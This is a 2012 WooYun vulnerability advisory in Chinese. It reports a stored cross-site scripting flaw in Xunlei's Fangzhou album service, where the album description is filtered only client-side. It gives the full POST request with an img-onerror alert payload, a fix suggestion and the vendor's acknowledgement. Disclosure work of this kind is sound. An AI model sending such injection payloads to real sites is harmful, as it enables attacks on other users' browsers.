漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-011783
漏洞标题:迅雷方舟储存型XSS一枚
相关厂商:迅雷
漏洞作者: 123hurray
提交时间:2012-09-05 15:54
修复时间:2012-10-20 15:54
公开时间:2012-10-20 15:54
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-09-05: 细节已通知厂商并且等待厂商处理中
2012-09-10: 厂商已经确认,细节仅向厂商公开
2012-09-20: 细节向核心白帽子及相关领域专家公开
2012-09-30: 细节向普通白帽子公开
2012-10-10: 细节向实习白帽子公开
2012-10-20: 细节向公众公开
简要描述:
迅雷方舟储存型XSS一枚
详细说明:
在迅雷方舟发布新专辑时只在前端用js做了特殊字符的过滤,而在后端则只对专辑名做过滤,忽略了对“专辑描述”的过滤,导致专辑描述中可能出现xss漏洞。所以绕过前端脚本验证即可向服务器传入xss。
以下是POST的数据,利用图片的onerror事件触发:
Request URL:http://svr.f.xunlei.com/folder/mkdir?xltime=8038554
Request Method:POST
Form Data:
requestType:8038554
proxyUrl:http://f.xunlei.com/postProxy.html
userId:53393744
path:/xss
desc:<img src='1' onerror='alert("xss")'>
category:13
status:1
topic:true
tags:
漏洞证明:
POST成功后即可见到如下截图:
该专辑可被任何用户浏览而导致严重问题。
迅雷方舟未过滤所有特殊字符,导致随意插入html标签。
修复方案:
在后端对传入数据做验证;转义特殊字符。
版权声明:转载请注明来源 123hurray@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2012-09-10 12:44
厂商回复:
感谢反馈,qiaoyue同学已经反馈过了,我们还在完善中,感谢关注迅雷安全!
最新状态:
暂无